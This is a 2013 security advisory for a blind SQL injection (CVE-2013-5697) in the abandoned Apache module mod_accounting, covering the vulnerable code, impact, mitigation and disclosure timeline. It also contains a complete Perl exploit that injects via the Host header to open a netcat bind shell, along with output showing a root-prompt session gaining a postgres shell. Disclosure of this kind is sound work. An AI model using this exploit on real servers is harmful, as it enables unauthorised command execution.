mod_accounting Module 0.5 – Blind SQL Injection

  • 作者: Wireghoul
    日期: 2013-09-30
  • 类别:
  • 来源:
  •  - Affected Vendor:
     - Affected Software: mod_accounting
     - Affected Version: 0.5. Other earlier versions may be affected.
     - Issue type: Blind SQL injection
     - Release Date: 20 Sep 2013
     - Discovered by: Eldar "Wireghoul" Marcussen
     - CVE Identifier: CVE-2013-5697
     - Issue status: Abandoned software, no patch available
    mod_accounting is a traffic accounting module for Apache 1.3.x which
    records traffic numbers in a database. Both MySQL and PostgreSQL database
    types are supported. It supports arbitrary database designs as traffic
    recording is performed via a user defined query in the Apache configuration
    using placeholders for received values. The following is an example
    <VirtualHost _default_:*>
    DocumentRoot "/var/www/"
    Options Indexes
    AccountingQueryFmt "INSERT INTO accounting VALUES( current_time, %r, %s,
    '%u', '%h' );"
    AccountingDatabase accounting
    AccountingDatabaseDriver postgres
    AccountingDBHost localhost 5432
    AccountingLoginInfo acct acct
    As user supplied values are not sanitised before being used in the
    placeholder values it is possible for an attacker to supply malicous values
    to perform blind SQL injection.
    The SQL injection occurs due to a user supplied HTTP header being used in
    the query without sanitisation. The module uses a simple string
    concatination approach to modify the placeholders in the user defined query
    before sending it to the database. This code can be located in
    409: // build the query string from the template
    410: while( ptr ) {
    411: char *next;
    413: next = strchr( ptr, '%' );
    415: if( next ) {
    416: char tmp[ 2 ];
    418: *next++ = '\0';
    420: switch( *next++ ) {
    422: case 'h':
    423: query = ap_pstrcat( p, query, ptr, cfg->ServerName ?
    cfg->ServerName : "-", NULL );
    424: break;
    426: case 's':
    427: query = ap_pstrcat( p, query, ptr, sent, NULL );
    428: break;
    430: case 'r':
    431: query = ap_pstrcat( p, query, ptr, recvd, NULL );
    432: break;
    434: case 'u':
    435: query = ap_pstrcat( p, query, ptr, get_user( r ), NULL
    436: break;
    438: default:
    439: tmp[0] = next[ -1 ];
    440: tmp[1] = '\0';
    442: query = ap_pstrcat( p, query, ptr, tmp, NULL );
    443: break;
    444: }
    446: next[ -2 ] = '%';
    448: } else
    449: query = ap_pstrcat( p, query, ptr, NULL );
    451: ptr = next;
    452: }
    454: ( *DBDrivers[ cfg->DBDriver ].Query )( cfg, server, p, query );
    456: cfg->Received = cfg->Sent = 0;
    It is important to note that the database query takes place after the page
    has been served, hence there is no easy way to determine if a particular
    injection method was successful apart from using an out of band approach.
    However, as the injection occurs in an insert statement it is likely that
    the successful injection vector is one of about a handful of likely
    An attacker is only limited by the capabilities of the database
    configuration and may be able to read, add, alter or delete data from your
    database(s), read or write arbitrary files or even execute commands on the
    server given a privileged database account.
    Proof of Concept
    root@bt:~/sploit-dev# cat
    # PoC of blind SQL injection in the mod_accounting/0.5 Apache module
    # Injection can occur via the Host header
    # As the injection occurs in a user defined insert statement a bit of trial
    and error is required
    # Database operations occurs asyncronous to page response so timing attacks
    wont work
    # This one is completely blind
    # DB can be mysql or postgres, this PoC only covers postgres
    # PoC executes netcat to listen on port 4444 (requires dba privileges)
    use IO::Socket::INET;
    print "#----------------------------------------------#\n";
    print "| mod_accounting/0.5 PoC exploit by \@Wireghoul |\n";
    print "| |\n";
    print "#----------Command execution via SQLi----------#\n";
    print "[*] Enumerating blind injection vectors:\n";
    my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
    # These should terminate most insert statements
    #my @endings = ( "');" );
    my $shell = 'nc -lnp 4444 -e /bin/sh';
    my $cnt = 0;
    my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
    '/lib/', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
    foreach $end (@endings) {
    my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
    connect to $ARGV[0]:$ARGV[1]: $!\n";
    my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
    \r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
    print "[-] Trying $end\n";
    print $sock $str;
    #print "Sent $end\n";
    close ($sock);
    print "[*] Done, remote server should have executed $shell\n";
    Execution of PoC:
    root@bt:~/sploit-dev# nc 4444
    (UNKNOWN) [] 4444 (?) : Connection refused
    root@bt:~/sploit-dev# perl 80
    | mod_accounting/0.5 PoC exploit by @Wireghoul |
    | |
    #----------Command execution via SQLi----------#
    [*] Enumerating blind injection vectors:
    [-] Trying '));
    [-] Trying "));
    [-] Trying ));
    [-] Trying ');
    [-] Trying ");
    [-] Trying );
    [-] Trying ';
    [-] Trying ";
    [-] Trying ;
    [*] Done, remote server should have executed nc -lnp 4444 -e /bin/sh
    root@bt:~/sploit-dev# nc 4444
    uid=101(postgres) gid=104(postgres) groups=104(postgres)
    As the module is no longer supported, discontinue the use of this module.
    Response Timeline
     - 03/09/2013 - Vendor notified
     - 03/09/2013 - Vendor acknowledge vulnerability
     - 04/09/2013 - Project download removed and website updated to reflect
     new status
     - 20/09/2013 - Advisory released